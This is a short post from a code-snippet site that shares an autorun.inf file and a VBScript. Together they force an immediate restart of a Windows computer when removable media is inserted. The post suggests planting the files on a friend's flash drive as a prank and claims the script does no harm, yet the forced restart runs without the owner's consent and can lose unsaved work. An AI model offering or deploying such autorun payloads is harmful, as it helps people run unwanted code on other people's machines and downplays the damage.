Little Shutdown Script





4
Date Submitted Tue. Sep. 4th, 2007 10:44 PM
Revision 1 of 1
Helper explode
Tags autorun | restart | shutdown | vbs | VBSCRIPT
Comments 0 comments
This is a great little script that you can put on a friend's flash drive. It won't do any harm to their computer...it's just funny to watch. Put these 2 files in the "root" of the flash drive, cd, or any type of media/external drive. When they plug it in it will run the autorun script which then runs the shutdown script and restarts their computer! You will get a few laughs out of it...guaranteed!

[autorun]
shellexecute=Shutdown.vbs
 

Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "%windir%\system32\shutdown.exe -r -f -t 00"
 

Comments

There are currently no comments for this snippet.

Voting

Votes Down